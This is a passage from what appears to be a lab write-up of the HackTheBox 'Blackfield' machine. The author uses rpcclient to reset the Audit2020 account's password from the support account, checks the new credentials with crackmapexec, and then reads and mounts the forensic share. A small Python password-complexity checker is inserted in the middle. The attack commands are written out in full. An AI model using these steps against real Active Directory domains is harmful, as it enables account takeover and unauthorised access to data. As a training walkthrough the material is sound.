➜ ldap rpcclient -U 'support' 10.10.10.192
Password for [WORKGROUP\support]:
rpcclient $> setuserinfo2 Audit2020 23 password123!
rpcclient $>
It worked. Note that the new password has to satisfy the domain complexity policy (hence the special character); if you don't supply a sufficiently complex password, the call returns an error instead.
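Added example, not from the original writeup: a small Python model of the Windows "password must meet complexity requirements" rule that rejected the plain password, so you can see which values a reset like the one above would be allowed to set. The three-of-four character-class rule, the 7-character minimum and the account-name check are assumptions about a default domain policy, not values taken from this box.

```python
import re

# Character classes counted by the (assumed) Windows complexity policy.
CLASSES = {
    "upper": re.compile(r"[A-Z]"),
    "lower": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "special": re.compile(r"[^A-Za-z0-9]"),
}


def check_complexity(password: str, sam_account_name: str, min_length: int = 7) -> list:
    """Return the list of policy violations; an empty list means the password passes.

    Assumed policy: minimum length, must not contain the account name (3+ chars),
    and characters from at least 3 of the 4 classes above.
    """
    problems = []
    if len(password) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if len(sam_account_name) >= 3 and sam_account_name.lower() in password.lower():
        problems.append("contains the account name")
    present = [name for name, rx in CLASSES.items() if rx.search(password)]
    if len(present) < 3:
        problems.append(
            f"only {len(present)} character class(es): {', '.join(present) or 'none'}"
        )
    return problems


if __name__ == "__main__":
    # Constructed sample values: the password used above and two that fail.
    for candidate in ("password123!", "password123", "Audit2020xyz!"):
        verdict = check_complexity(candidate, "Audit2020")
        print(f"{candidate!r}: {'OK' if not verdict else '; '.join(verdict)}")
```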
Using crackmapexec to check whether the password for the user Audit2020 was actually changed:
➜ ldap crackmapexec smb 10.10.10.192 -u Audit2020 -p 'password123!' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\Audit2020:password123!
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
It did change, and the account can now read the forensic share.
➜ ldap smbclient //10.10.10.192/forensic -U "Audit2020%password123\!"
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 18:33:16 2020
.. D 0 Sun Feb 23 18:33:16 2020
commands_output D 0 Sun Feb 23 23:44:37 2020
memory_analysis D 0 Fri May 29 01:58:33 2020
tools D 0 Sun Feb 23 19:09:08 2020
5102079 blocks of size 4096. 1680064 blocks available
Mounted the share locally with cifs:
sudo mount -t cifs -o 'username=audit2020,password=password123!' //10.10.10.192/forensic /mnt/htb/blackfield